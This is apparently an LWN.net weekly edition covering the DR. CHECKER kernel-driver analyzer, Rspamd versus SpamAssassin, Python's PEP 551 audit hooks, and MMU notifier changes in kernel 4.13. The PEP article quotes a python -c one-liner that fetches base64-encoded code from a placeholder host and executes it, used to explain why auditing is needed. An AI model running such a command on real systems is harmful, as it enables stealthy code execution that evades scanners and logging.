This edition contains the following feature content:

This week's edition also includes these inner pages:

Brief items: Brief news items from throughout the community.

Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Drivers are a consistent source of kernel bugs, at least partly due to less review, but also because drivers are typically harder for tools to analyze. A team from the University of California, Santa Barbara has set out to change that with a static-analysis tool called DR. CHECKER. In a paper [PDF] presented at the recent 26th USENIX Security Symposium, the team introduced the tool and the results of running it on nine production Linux kernels. Those results were rather encouraging: "it correctly identified 158 critical zero-day bugs with an overall precision of 78%".

Technique

The researchers, Aravind Machiry, Chad Spensky, Jake Corina, Nick Stephens, Christopher Kruegel, and Giovanni Vigna, added their analysis module to the LLVM compiler. It is a "soundy" analysis—a term derived from "soundiness"—which means that it is mostly based on fully accurate (or sound) reasoning about the program. In order to keep the analysis space tractable and to provide usable results without overwhelming numbers of false positives, various unsound assumptions and tradeoffs are made. The researchers tried to limit those, however:

We are able to overcome many of the inherent limitations of static analysis by scoping our analysis to only the most bug-prone parts of the kernel (i.e., the drivers), and by only sacrificing soundness in very few cases to ensure that our technique is both scalable and precise. DR. CHECKER is a fully-automated static analysis tool capable of performing general bug finding using both pointer and taint analyses that are flow-sensitive, context-sensitive, and field-sensitive on kernel drivers.

As part of the motivation for creating the tool, the team describes an integer overflow bug found in the Huawei Bastet driver. The driver uses a user-controlled field in a structure to calculate the size of a buffer to allocate, but the integer overflow allows an attacker to cause the buffer to be far too small, resulting in a buffer overrun. As described in the paper, the bug demonstrates the need for a tool like DR. CHECKER:

There are many notable quirks in this bug that make it prohibitively difficult for naïve static analysis techniques. First, the bug arises from tainted-data (i.e., argp) propagating through multiple usages into a dangerous function, which is only detectable by a flow-sensitive analysis. Second, the integer overflow occurs because of a specific field in the user-provided struct, not the entire buffer. Thus, any analysis that is not field sensitive would over-approximate this and incorrectly identify flow_p as the culprit. Finally, the memory corruption [occurs] in a different function (i.e., adjust_traffic_flow_by_pkg), which means that the analysis must be able to handle inter-procedural calls in a context-sensitive way to precisely report the origin of the tainted data. Thus, this bug is likely only possible to detect and report concisely with an analysis that is flow-, context-, and field-sensitive. Moreover, the fact that this bug exists in the driver of a popular mobile device, shows that it evaded both expert analysts and possibly existing bug-finding tools.
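The arithmetic behind this class of bug can be sketched in a few lines. The driver's actual code is not reproduced here, so the header size, element size, and function names below are hypothetical; the sketch only models how a 32-bit size calculation wraps around when one user-controlled field is large enough.

```python
U32 = 0xFFFFFFFF  # mask that models 32-bit unsigned arithmetic

HEADER_SIZE = 16   # hypothetical fixed header, in bytes
ELEMENT_SIZE = 8   # hypothetical per-element size, in bytes


def alloc_size(count: int) -> int:
    """Size the driver would request, wrapped to 32 bits like C unsigned math."""
    return (HEADER_SIZE + count * ELEMENT_SIZE) & U32


def bytes_written(count: int) -> int:
    """Bytes a later copy would write, computed without any wraparound."""
    return HEADER_SIZE + count * ELEMENT_SIZE


def is_overrun(count: int) -> bool:
    """True when the copy would run past the end of the allocated buffer."""
    return bytes_written(count) > alloc_size(count)


benign = 4
hostile = 0x20000000  # 2**29 elements: 2**29 * 8 == 2**32, which wraps to 0

print(alloc_size(benign), is_overrun(benign))
print(alloc_size(hostile), is_overrun(hostile))
```

With the hostile count, the requested allocation collapses to just the header while the copy still covers every element, which is the "far too small" buffer the article describes.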

DR. CHECKER takes a modular approach to its analysis. There are two analysis clients that are invoked throughout the analysis pass through the code, which is called the "soundy driver traversal" (SDT). Those clients share global state and can benefit from each other's results. Once that pass is complete, the global state is used by various vulnerability detectors to find specific kinds of bugs and generate warnings.

In order to focus solely on the driver code, the tool makes the assumption that Linux API calls operate completely correctly, so that they lie outside the scope of the analysis. That means that only function calls within the driver need to be followed and tracked.

The two clients implement a "points-to" analysis to determine where pointers are pointing in a field-sensitive way and a "taint" analysis to determine when values could have been provided by user space. The points-to client tracks dynamic allocation as well as static and automatic variables. It knows enough about the kernel API to recognize allocation functions; it can also recognize the effects of library calls like memcpy(). The taint analysis looks at the sources for tainted data, either as arguments to entry points (e.g. ioctl()) or via kernel functions that copy data from user space (e.g. copy_from_user()).
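To make "flow-sensitive" and "field-sensitive" concrete, here is a toy taint tracker. It is far simpler than DR. CHECKER, which works on LLVM bitcode; the tuple-based mini-language, the location names such as req.len, and the choice of sinks are all invented for illustration.

```python
def analyze(program):
    """Walk a straight-line program and report tainted values reaching sinks.

    Locations are plain strings; struct fields are tracked separately
    ("req.len" vs. "req.flags"), which is what makes this field-sensitive.
    Taint is updated statement by statement, which makes it flow-sensitive.
    """
    tainted = set()
    warnings = []
    for lineno, op in enumerate(program, start=1):
        kind = op[0]
        if kind == "source":        # value arrives from user space
            tainted.add(op[1])
        elif kind == "const":       # value overwritten with a constant
            tainted.discard(op[1])
        elif kind == "assign":      # dst takes on the taint state of src
            _, dst, src = op
            if src in tainted:
                tainted.add(dst)
            else:
                tainted.discard(dst)
        elif kind == "sink":        # risky use of a value
            _, func, arg = op
            if arg in tainted:
                warnings.append((lineno, func, arg))
    return warnings


PROGRAM = [
    ("source", "req.len"),            # 1: only this field is user-controlled
    ("const", "req.flags"),           # 2: a sibling field stays clean
    ("assign", "size", "req.len"),    # 3: taint propagates to size
    ("sink", "kmalloc", "size"),      # 4: warning expected here
    ("sink", "kmalloc", "req.flags"), # 5: no warning (field-sensitive)
    ("const", "size"),                # 6: size is overwritten
    ("sink", "memcpy", "size"),       # 7: no warning (flow-sensitive)
]

print(analyze(PROGRAM))
```

An analysis that tainted all of req at once would flag line 5, and one that ignored statement order would flag line 7; both would be false positives.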

There are eight separate vulnerability detectors that are each briefly described in the paper. Almost all of them look for incorrect handling of tainted data in one way or another, so they are heavily reliant on the taint analysis results. The tests look at such things as improperly using tainted data (e.g. passing it to risky functions like strcmp()), arithmetic on tainted data that could lead to an underflow or overflow, casts to differently sized types, dereferencing tainted pointers, accessing global variables without proper locking, and so on.

The paper goes into quite a bit of detail of the techniques used and is worth a read for those interested. There were some logistical hurdles to overcome in trying to identify the vendor drivers in multiple kernel source trees. Beyond that, finding the entry points into the drivers was tricky as well; different subsystems have different views of the offset for a driver's ioctl() function, for example.

Results

The researchers ran DR. CHECKER on the drivers in nine mobile devices from four different manufacturers. A total of 3.1 million lines of code was analyzed in 437 separate drivers. They also ran four other static-analysis tools: flawfinder, RATS, Cppcheck, and Sparse. Ultimately, those tools were found wanting for a variety of reasons, most often because of the number of false positives generated.

DR. CHECKER uses Clang to compile each of the driver source files into LLVM bitcode, which contains the compiler's intermediate representation. Compiling the drivers required some changes to Clang to support the GCC-specific constructs and compiler flags used by the normal kernel build. Those individual bitcode files are then combined using the llvm-link tool to create a single file to hand off to DR. CHECKER.

Some 5,000 warnings were generated, of which nearly 4,000 were verified as correct by the team. Of those, 158 were actual bugs that were reported upstream and fixed. So 78% of the reports were correct and 3% actually resulted in security fixes for the kernel. The paper noted that there are a number of improvements that could be made to reduce duplicated, but correct, warnings as well as false positives. It also points out that the code could likely be adapted for other code bases.

Overall, DR. CHECKER looks like a useful tool that could potentially be applied more widely. Vendors may wish to analyze their drivers and device makers could do the same for all of the drivers in their device. It would also seem like there may be some lurking bugs in mainline drivers that could be ferreted out using the tool.

[Thanks to Paul Wise for pointing us toward DR. CHECKER.]

Running one's own mail system on the Internet has become an increasingly difficult thing to do, to the point that many people don't bother, even if they have the necessary skills. Among the challenges is spam; without effective spam filtering, an email account will quickly drown under a deluge of vile offers, phishing attempts, malware, and alternative facts. Many of us turn to SpamAssassin for this task, but it's not the only alternative; Rspamd is increasingly worth considering in this role. Your editor gave Rspamd a spin to get a sense for whether switching would be a good thing to do.

SpamAssassin is a highly effective tool; its developers could be forgiven for thinking that they have solved the spam problem and can move on. Which is good, because they would appear to have concluded exactly that. The "latest news" on the project's page reveals that the last release was 3.4.1, which came out in April 2015. Stability in a core communications tool is good but, still, it is worth asking whether there is really nothing more to be done in the area of spam filtering.

The Rspamd developers appear to believe that there is; this project is moving quickly with several releases over the past year, the last being 1.6.3 at the end of July. The project's repository shows 2,545 commits since the 1.3.5 release on September 1, 2016; 32 developers contributed to the project in that time, though one of them (Vsevolod Stakhov) was the source of 71% of the commits. The project is distributed under the Apache License v2.

The Rspamd developers clearly see processing speed as one of their selling points. SpamAssassin, written in Perl, is known to be a bit of a resource hog. Rspamd is written in C (with rules and extensions in Lua), and claims to be able to "process up to 100 emails per second using a single CPU core". That should be sufficiently fast for most small-to-medium sites, though it is probably advisable to dedicate another CPU to the task if there are any linux-kernel subscribers in the mix.

One of the nice things about SpamAssassin is that it's relatively easy to set up; in an extreme, it can be run from a nonprivileged account using a procmail incantation with no daemon process required. Rspamd is not so simple; it really wants to run as a separate daemon that is tightly tied into the mail transport agent (MTA). That means, for example, configuring Postfix to pass messages to the Rspamd server; the configuration of Rspamd itself can also be fairly involved. As a result, experimenting with Rspamd is not quite so simple. But, in return, one gets a number of useful features.

Perhaps foremost, the direct integration with the MTA means that spam filtering takes place while the SMTP conversation is ongoing. That makes techniques like greylisting possible. It also enables the rejection of overt spam outright, before it has been accepted from the remote server; this has a couple of advantages: there is no need to store the spam locally, and the sender will get a bounce — assuming there is a real sender who cares about such things. Yes, one can configure things to use SpamAssassin in this way, but it involves a rather larger amount of duct tape.

Rspamd offers many of the same filtering mechanisms that SpamAssassin supports, including regular-expression matching, DKIM and SPF checks, and online blacklists. It has a bayesian engine that, the project claims, is more sophisticated and effective than SpamAssassin's; it looks at groups of words, rather than just single words. There is a "fuzzy hash" mechanism that is meant to catch messages that look like previous spam with trivial changes. As with SpamAssassin, each classification mechanism has a score associated with it; the sum of all the scores gives the overall spam score for a given message.

While it doesn't have to be this way, SpamAssassin is normally used in a binary mode: a message is either determined to be spam or it is not. Rspamd classifies messages into several groups, depending on how obvious its nature is. At different scores, a message might be greylisted, have its subject line marked, have an X-Spam header added, or be rejected outright. Implementing all of these actions requires cooperation from the MTA, of course.
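The score-to-action mapping described above can be sketched as follows. The thresholds and symbol names are invented for the example and are not Rspamd's defaults; the point is only that per-rule scores are summed and the total selects one of several graded actions.

```python
# Hypothetical thresholds, ordered from most to least severe.
ACTIONS = [
    (15.0, "reject"),
    (8.0, "add header"),
    (6.0, "rewrite subject"),
    (4.0, "greylist"),
]


def total_score(symbols):
    """Sum the scores of every rule that matched the message."""
    return sum(symbols.values())


def choose_action(score):
    """Return the most severe action whose threshold the score reaches."""
    for threshold, action in ACTIONS:
        if score >= threshold:
            return action
    return "no action"


# Hypothetical rule names and scores for one message.
matched = {"BAYES_SPAM": 5.0, "FUZZY_MATCH": 2.0, "SPF_PASS": -0.5}
print(total_score(matched), choose_action(total_score(matched)))
```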

Rspamd comes with its own built-in web server which, by default, is only available through the loopback interface. It can present various types of plots describing the traffic it has processed. The server can also be used to alter the configuration on the fly, changing the scores associated with various tests, and more. These changes do not appear to be saved permanently, though, so the system administrator still has to edit the (numerous) configuration files to make a change that will stick.

Your editor set up and ran Rspamd with a copy of his email stream. What followed was an unpleasant exercise in going carefully through the spam folder to see what the results were — a task that resembles cleaning up after the family pet with one's bare hands and which quickly reduces one's faith in humanity as a whole. The initial results were a little discouraging, in that Rspamd filtered spam less effectively than SpamAssassin. More discouraging was a fair number of false positives. When the number of incoming spam messages reaches into the thousands per day, one tends not to spend much time looking for messages that were erroneously classified as spam, especially as confidence in the filter grows. So false positives are legitimate email that will probably never be seen; avoiding false positives thus tends to be a high priority for developers of spam filters.

At this point, though, the comparison was somewhat unfair: a fresh Rspamd was pitted against a SpamAssassin with a well-trained bayesian filter. Like SpamAssassin, Rspamd provides a tool that can be used to feed messages for filter training. Your editor happened to have both a mail archive and a massive folder full of spam sitting around. Training the filter with both of those yielded considerably better results and, in particular, an apparent end to false positives, with one exception. And yes, the rspamc tool, used to train the filter, runs far more quickly than sa-learn does.

The one exception regarding false positives is significant. The documentation of Rspamd's pattern-matching rules is poor relative to SpamAssassin, so it took a while to find out what MULTIPLE_UNIQUE_HEADERS is looking for. In short, it is checking the message for multiple instances of headers that should appear only once (References: or In-Reply-To:, for example). The penalty for this infraction is severe: ten points, enough to condemn a message on its own, even if, say, the bayesian filter gives a 100% probability that the message is legitimate. Unfortunately, git send-email is prone to duplicating just those headers at times, with the result that patches end up in the spam folder.
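For anybody wanting to check whether their own outgoing patches would trip this rule, the test it performs can be approximated with Python's standard email module. This is a sketch of the check as described above, not Rspamd's implementation; the list of single-instance headers is limited to the two named in the text, and the sample message is made up.

```python
from email import message_from_string

# Headers that should appear at most once (only the two named above).
SINGLETON_HEADERS = ("References", "In-Reply-To")


def duplicated_headers(raw_message):
    """Return the single-instance headers that occur more than once."""
    msg = message_from_string(raw_message)
    return [name for name in SINGLETON_HEADERS
            if len(msg.get_all(name, [])) > 1]


SAMPLE = (
    "From: dev@example.org\n"
    "Subject: [PATCH] fix a thing\n"
    "In-Reply-To: <a@example.org>\n"
    "In-Reply-To: <a@example.org>\n"
    "References: <a@example.org>\n"
    "\n"
    "patch body\n"
)

print(duplicated_headers(SAMPLE))
```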

SpamAssassin has an interesting mechanism for automatically computing what the score for each rule should be. Rspamd does not appear to have anything equivalent; how its scores have been determined is not entirely clear. The overall feel of the results suggests a relative lack of maturity that has the potential to create the occasional surprise.

After a few days of use, the overall subjective impression is that Rspamd is nearly — but not quite — as effective as SpamAssassin. It seems especially likely to miss the current crop of "your receipt" spams containing nothing but a hostile attachment. That said, training has improved its performance quickly and may well continue to do so. The experiment will be allowed to run for a while yet.

So is moving from SpamAssassin to Rspamd a reasonable thing to do? A site with a working SpamAssassin setup may well want to stay with it if the users are happy with the results. There might also be value in staying put for anybody who fears the security implications of a program written in C that is fully exposed to a steady stream of hostile input. The project does not appear to have ever called out an update with security implications; it seems unlikely that there have never been any security-relevant bugs fixed in a tool of this complexity.

But, for anybody who sees the benefit of a more active development community, better performance, better MTA integration, newer filtering mechanisms, and a web interface with cute pie charts, changing over might make sense. There is even a module to import custom SpamAssassin rules to make the task easier (but there is no way to import an existing SpamAssassin bayesian database). In any case, it is good to see that development on spam filters continues, even if the SpamAssassin community has mostly moved on to other things.

As Steve Dower noted in his lightning talk at the 2017 Python Language Summit, Python itself can be considered a security vulnerability—because of its power, its presence on a target system is a boon to attackers. Now, Dower is trying to address parts of that problem with a Python Enhancement Proposal (PEP) that would enable system administrators and others to detect when Python is being used for a nefarious purpose by increasing the "security transparency" of the language. It is not a solution that truly thwarts an attacker's ability to use Python in an unauthorized way, but will make it easier for administrators to detect, and eventually disable, those kinds of attacks.

Threats

In PEP 551 (Security transparency in the Python runtime), Dower described the aim of the proposal: "The goals in order of increasing importance are to prevent malicious use of Python, to detect and report on malicious use, and most importantly to detect attempts to bypass detection." He also posted his first draft of the PEP to the Python security-sig mailing list. In the preface of that post, he gave a bit more detail on where the idea has come from and what it is meant to do:

This comes out of work we've been doing at Microsoft to balance the flexibility of scripting languages with their usefulness to malicious users. PowerShell in particular has had a lot of work done, and we've been doing the same internally for Python. Things like transcripting (log every piece of code when it is compiled) and signature validation (prevent loading unsigned code). This PEP is about upstreaming enough functionality to make it easier to maintain these features - it is *not* intended to add specific security features to the core release. The aim is to be able to use a standard libpython3.7/python37.dll with a custom python3.7/python.exe that adds those features (listed in the PEP).

The kinds of attacks that PEP 551 seeks to address are advanced persistent threats (APTs) that make use of vulnerabilities of various sorts to establish a beachhead inside a network. Often Python is used from there to further the reach of the APT to other systems and networks, generally to extract data, but sometimes to damage data or hardware; Dower mentioned WannaCrypt (or WannaCry) and Stuxnet as examples of the latter. Python provides plenty for attackers to work with:

Python is a particularly interesting tool for attackers due to its prevalence on server and developer machines, its ability to execute arbitrary code provided as data (as opposed to native binaries), and its complete lack of internal logging. This allows attackers to download, decrypt, and execute malicious code with a single command:

    python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())"

This command currently bypasses most anti-malware scanners that rely on recognizable code being read through a network connection or being written to disk (base64 is often sufficient to bypass these checks). It also bypasses protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or access another machine on the local network from which to obtain its payload).

New API

To combat the problem, Dower is proposing some additions to the Python API "to enable system administrators to integrate Python into their existing security systems, without dictating what those systems look like or how they should behave". There are two parts to the proposal: adding audit hooks that will be called from certain sensitive places within the Python runtime and standard library, and adding a way to intercept calls to open a file for execution (e.g. imports) to perform additional checks, such as permission or integrity checks, before the operation is performed.

For auditing, there would be calls added to the C and Python APIs to add an audit event to the stream or to add a callback that would be made when an event is generated. For C, it would look as follows:

    typedef int (*hook_func)(const char *event, PyObject *args);

    /* Add an auditing hook */
    int PySys_AddAuditHook(hook_func hook);

    /* Raise an event with all auditing hooks */
    int PySys_Audit(const char *event, PyObject *args);

There is also an internal cleanup function described (_Py_ClearAuditHooks()). Python code could access these capabilities using:

    # Add an auditing hook
    sys.addaudithook(hook: Callable[str, tuple]) -> None

    # Raise an event with all auditing hooks
    sys.audit(str, *args) -> None

Those are both taken from the PEP, which uses the type annotations for the Python code. As expected, addaudithook() takes a callable with effectively the same kinds of arguments (a string and tuple) as are passed to audit(). Both functions will return None.

CPython and the standard library would get calls to PySys_Audit() and sys.audit() in multiple locations, while audit hooks would be added by administrators. Multiple hooks can be added and they will be called in the order in which they were added; if a hook causes an exception, any further hooks are ignored and (normally) the Python runtime will exit.
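A minimal sketch of how a hook might be used from Python follows. It assumes Python 3.8 or later, where functions with these names are available in the sys module; the "demo.event" name and the recording list are made up for the example. Note that a hook sees every audit event raised in the process, so this one filters on its own prefix.

```python
import sys

seen = []  # events recorded by the hook below


def demo_hook(event, args):
    """Record only the events raised by this example."""
    # Hooks are called for all audit events in the process (imports,
    # file opens, and so on), so ignore anything that is not ours.
    if event.startswith("demo."):
        seen.append((event, args))


# Hooks cannot be removed once added; this one stays for the process lifetime.
sys.addaudithook(demo_hook)

# Raise a custom event; the positional arguments reach the hook as a tuple.
sys.audit("demo.event", 1, "two")

print(seen)
```

A real deployment would forward events to the system's logging or auditing facility rather than to an in-memory list.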

The second API addition allows administrators to add a verification step before Python opens a file for execution. A single verification handler can be registered from C:

    typedef PyObject *(*handler_func)(const char *narrow, const wchar_t *wide);

    /* Set the handler */
    int Py_SetOpenForExecuteHandler(handler_func handler);

The handler function will be passed the path of the file to be opened (in either narrow or wide format depending on the platform). The handler should do whatever verification it needs to do and return a file-like object that allows reading bytes, or raise an exception if the verification fails. Python code in the standard library that opens a file for execution will call:

    # Open a file using the handler
    os.open_for_exec(pathlike)

That function is a drop-in replacement for open(pathlike, 'rb'), which opens the file for read-only, binary access. Since importlib will need to use open_for_exec() before os has been imported, there will be another version of it in the OS-specific nt and posix modules.
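What such a verification handler might do can be sketched in pure Python. This does not call the proposed os.open_for_exec(); make_verifying_opener() and the digest allowlist are hypothetical names, and a SHA-256 allowlist is just one possible integrity policy.

```python
import hashlib
import io
import os
import tempfile


def make_verifying_opener(allowed_digests):
    """Build an opener that only returns files whose SHA-256 is approved."""
    def open_for_exec(path):
        with open(path, "rb") as f:
            data = f.read()
        digest = hashlib.sha256(data).hexdigest()
        if digest not in allowed_digests:
            raise PermissionError(f"{path}: not on the approved list")
        # Hand back the bytes that were verified, not a fresh file handle,
        # so the content cannot change between the check and the use.
        return io.BytesIO(data)
    return open_for_exec


def demo():
    """Approve one file, read it, then tamper with it and try again."""
    source = b"print('hi')\n"
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "mod.py")
        with open(path, "wb") as f:
            f.write(source)
        opener = make_verifying_opener({hashlib.sha256(source).hexdigest()})
        accepted = opener(path).read()
        with open(path, "ab") as f:
            f.write(b"import evil\n")
        try:
            opener(path)
            rejected = False
        except PermissionError:
            rejected = True
    return accepted, rejected


print(demo())
```

Like the handler in the proposal, the opener either returns a file-like object that yields bytes or raises an exception.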

The PEP does note that it is easy for attackers' code to monkey patch importlib to remove the verification; auditing hooks should be used to detect and handle that case. In addition, there are other mechanisms that can be used to execute code that does not come directly from a file (e.g. compile(), exec()); auditing those will need to be part of any real solution.

Those new APIs provide the means for an administrator to "look inside" the Python runtime but, in order to be effective, changes need to be made to the Python binary to enable the features. That's where the spython binary comes into play. Though the name is already undergoing some bikeshedding, the idea is to provide an example of a "restricted" Python binary that could be installed on production systems to try to detect or thwart APTs. Dower's GitHub repository that contains his current implementation of the APIs has the source for spython.c.

Recommendations

The PEP strongly recommends that administrators create their own version of the spython program that reflects local policies and priorities. The example program takes no arguments other than a script name and logs all audit events to a scriptname.log file. It restricts importable modules (to only .py files, which disallows using cached bytecode from .pyc files) and global name lookup for the pickle module. It also disallows any hooks being added after those it installs. Spython can be built in the Python source tree and will be used in the test suite, but it will not be shipped with python.org binary distributions; other distributions are expected to only ship it as an example or test binary.

Overall, the idea is to give administrators a new level of control of the capabilities of the Python they install without having to hack the core Python code. Anecdotal evidence suggests that organizations are moving away from Python because it lacks a way to integrate the language with the other security features normally used on their systems. Installing Python becomes a liability in those environments, which makes administrators shy away from it.

The PEP comes with a set of recommendations for administrators to give them a guide of the best practices for using the "security transparency" features it enables. For example:

The default python entry point should not be deployed to production machines, but could be given to developers to use and test Python on non-production machines. Sysadmins may consider deploying a less restrictive version of their entry point to developer machines, since any system connected to your network is a potential target. Sysadmins may deploy their own entry point as python to obscure the fact that extra auditing is being included.

Other recommendations include using the native auditing system rather than simply writing local files, not aborting the interpreter for abnormal events since that will encourage attackers to work around those features (detection is a higher priority than prevention), and correlating events that should happen together (e.g. import, followed by open_for_exec(), then compile) in order to detect attempts to bypass auditing. The PEP notes that the list is (necessarily) incomplete and that more recommendations may be added over time.

So far, no real performance numbers have been gathered. The intent is for the feature to have minimal impact when it is not being used. Since it is an opt-in feature, though, the performance with hooks enabled is not really at issue (though one presumes it will be reasonably optimized). "Preliminary testing shows that calling sys.audit with no hooks added does not significantly affect any existing benchmarks, though targeted microbenchmarks can observe an impact." Another unfinished piece is to add more hook locations to the core and standard library.

Reception

The comments on the proposal have been fairly limited, but are quite favorable overall. There were some suggestions and thoughts in response to the first posting in the security-sig mailing list. The PEP was then updated and posted to python-dev for wider review. In the end, the PEP really only provides a way for administrators to look inside the interpreter; what they do with that ability is largely beyond its scope. But it does enable administrators to relatively easily do something they cannot do now.

There were concerns posted in both threads about circumventing the auditing (or forging audit events), but both of those are seen (by Dower, at least) as potential red flags for detecting the malicious activity. However, moving to a separate module (rather than using sys ), as suggested by Nick Coghlan, was seen as making it too easy to replace the functionality. As Dower put it:

It's important to minimise the surface area of these features, and having the ability to disable auditing by shadowing/replacing a module is a little scary. At least when you replace sys you've got to do a bit of work to keep it a secret. (This is also the reasoning for using static variables internally rather than interpreter state - it's much harder to infer the address of a static C variable with pure Python code than a field in a struct.)

James Powell, who did a lot of initial research and implementation of the feature, also chimed in:

I'll add a little bit of detail. These aren't "security features"; they're "security transparency features." We acknowledge that we cannot block every malicious payload, but we should at least make it possible to audit interpreter state for post-mortem forensic purposes. We wouldn't want it to be too easy to turn off these auditing features, and I've done a good amount of research into corrupting the running state of a CPython interpreter. Keeping things in builtin modules and in memory not directly exposed to the interpreter creates a real barrier to these techniques, and makes it meaningfully harder for an attacker to just disable the features at the start of their payload.

Adding the feature seems like a near no-brainer, unless some serious performance or other problems rear their head—not a likely outcome, seemingly. So far, there has been no reaction from Guido van Rossum, Python's benevolent dictator for life (BDFL), but he will ultimately either rule on it or appoint a BDFL-delegate to do so. It is quite plausible we will see PEP 551 delivered in Python 3.7, which is due in mid-2018.

One does not normally expect to see significant changes to an important internal memory-management mechanism in the time between the ‑rc7 prepatch and the final release for a development cycle, but that is exactly what happened just before 4.13 was released. A regression involving the memory-management unit (MMU) notifier mechanism briefly threatened to delay this release, but a last-minute scramble kept 4.13 on schedule and also resulted in a cleanup of that mechanism. This seems like a good time to look at a mechanism that Linus Torvalds called "a badly designed mistake" and how it was made to be a bit less mistaken.

MMU Notifiers

A computer's memory-management unit handles the mapping between virtual and physical addresses, tracks the presence of physical pages in memory, handles memory-access permissions, and more. Much of the work of the memory-management subsystem is concerned with keeping the MMU properly configured in response to workload changes on the system. The details of MMU management are nicely hidden, so that the rest of the kernel does not (most of the time) have to worry about it, and neither does user space.

Things have changed over the last ten years or so in ways that have rendered the concept of "the MMU" rather more fuzzy. The initial driver of this change was virtualization; a mechanism like KVM must ensure that the host's and the guest's views of the MMU are consistent. That typically involves managing a set of shadow page tables within the guest. More recently, other devices have appeared on the memory bus with their own views of memory; graphics processing units (GPUs) have led this trend with technologies like GPGPU, but others exist as well. To function properly, these non-CPU MMUs must be updated when the memory-management subsystem makes changes, but the memory-management code is not able (and should not be able) to make changes directly within the subsystems that maintain those other MMUs.

To address this problem, Andrea Arcangeli added the MMU notifier mechanism during the 2.6.27 merge window in 2008. This mechanism allows any subsystem to hook into memory-management operations and receive a callback when changes are made to a process's page tables. One could envision a wide range of callbacks for swapping, protection changes, etc., but the actual approach was simpler. The main purpose of an MMU notifier callback is to tell the interested subsystem that something has changed with one or more pages; that subsystem should respond by simply invalidating its own mapping for those pages. The next time a fault occurs on one of the affected pages, the mapping will be re-established, reflecting the new state of affairs.
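The invalidate-then-refault pattern can be modeled in a few lines of Python. This is a toy model, not the kernel's C API: the AddressSpace and SecondaryMMU classes, and the use of dictionaries as page tables, are invented purely to show why a single "something changed" callback is enough.

```python
class AddressSpace:
    """Toy stand-in for a process's page tables: virtual page -> frame."""

    def __init__(self):
        self.page_table = {}
        self.notifiers = []

    def register(self, notifier):
        self.notifiers.append(notifier)

    def map_page(self, vpage, frame):
        """Change a mapping, then tell subscribers their copy is stale."""
        self.page_table[vpage] = frame
        for notifier in self.notifiers:
            notifier.invalidate(vpage)


class SecondaryMMU:
    """Toy device or hypervisor keeping its own cached view of the mappings."""

    def __init__(self, mm):
        self.mm = mm
        self.shadow = {}
        self.faults = 0
        mm.register(self)

    def invalidate(self, vpage):
        # The only reaction to a notification: forget the cached mapping.
        self.shadow.pop(vpage, None)

    def access(self, vpage):
        # A missing entry "faults" and is refilled from the primary tables.
        if vpage not in self.shadow:
            self.faults += 1
            self.shadow[vpage] = self.mm.page_table[vpage]
        return self.shadow[vpage]


mm = AddressSpace()
gpu = SecondaryMMU(mm)
mm.map_page(0x10, 7)
first = gpu.access(0x10)    # faults, then caches frame 7
again = gpu.access(0x10)    # served from the cache, no new fault
mm.map_page(0x10, 9)        # the page moves; the cached entry is dropped
moved = gpu.access(0x10)    # faults again and picks up frame 9
print(first, again, moved, gpu.faults)
```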

There are a few ways of signaling the need for invalidation, though, starting with the invalidate_page() callback:

    void (*invalidate_page)(struct mmu_notifier *mn, struct mm_struct *mm,
                            unsigned long address);

This callback can be invoked after the page-table entry for the page at address in the address space indicated by mm has been removed, but while the page itself still exists. That is not the only notification mechanism, though; larger operations can be signaled with:

    void (*invalidate_range_start)(struct mmu_notifier *mn,
                                   struct mm_struct *mm,
                                   unsigned long start, unsigned long end);
    void (*invalidate_range_end)(struct mmu_notifier *mn,
                                 struct mm_struct *mm,
                                 unsigned long start, unsigned long end);

In this case, invalidate_range_start() is called while all pages in the affected range are still mapped; no more mappings for pages in the region should be added in the secondary MMU after the call. When the unmapping is complete and the pages have been freed, invalidate_range_end() is called to allow any necessary cleanup to be done.

Finally, there is also:

    void (*invalidate_range)(struct mmu_notifier *mn, struct mm_struct *mm,
                             unsigned long start, unsigned long end);

This callback is invoked when a range of pages is actually being unmapped. It can be called between calls to invalidate_range_start() and invalidate_range_end() , but it can also be called independently of them in some situations. One might wonder why both invalidate_page() and invalidate_range() exist and, indeed, that is where the trouble started.
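The invalidate-then-refault pattern described above can be sketched in user space. What follows is a toy model, not kernel code: the toy_mmu structure, the helper names, and the sixteen-page address space are all assumptions made for illustration. The model is also coarser than the rule stated above, in that it refuses every new mapping while any invalidation is in progress rather than only those inside the affected range.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define TOY_NPAGES     16   /* size of the toy address space, in pages */
#define TOY_PAGE_SHIFT 12   /* 4KB pages */

/* Hypothetical secondary MMU: one "mapped" flag per page, plus a count
 * of invalidations that have started but not yet ended. */
struct toy_mmu {
    bool mapped[TOY_NPAGES];
    int  invalidations_active;
};

/* Models invalidate_range_start(): forget our mappings for [start, end)
 * and stop creating new ones until the matching end call arrives. */
void toy_range_start(struct toy_mmu *m, unsigned long start, unsigned long end)
{
    m->invalidations_active++;
    if (end <= start)
        return;
    for (unsigned long idx = start >> TOY_PAGE_SHIFT;
         idx <= ((end - 1) >> TOY_PAGE_SHIFT) && idx < TOY_NPAGES; idx++)
        m->mapped[idx] = false;
}

/* Models invalidate_range_end(): the primary page tables are settled
 * again, so faults may repopulate the secondary MMU. */
void toy_range_end(struct toy_mmu *m, unsigned long start, unsigned long end)
{
    (void)start;
    (void)end;
    assert(m->invalidations_active > 0);
    m->invalidations_active--;
}

/* Models a fault in the secondary MMU. Returns true if the mapping was
 * (re-)established, false if the caller has to retry later. */
bool toy_fault(struct toy_mmu *m, unsigned long addr)
{
    unsigned long idx = addr >> TOY_PAGE_SHIFT;

    if (idx >= TOY_NPAGES || m->invalidations_active > 0)
        return false;
    m->mapped[idx] = true;
    return true;
}
```

A fault on page 3 succeeds, fails between toy_range_start() and toy_range_end() on a range covering that page, and succeeds again afterward, which is the "mapping will be re-established on the next fault" behavior in miniature.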

The end of invalidate_page()

In late August, Adam Borowski reported that he was getting warnings from the 4.13-rc kernel when using KVM, followed by the quick demise of the host system. Others had been experiencing similar strangeness, including a related crash that seemed to be tied to the out-of-memory handler. After testing and bisection, a commit fixing another bug was identified as the culprit.

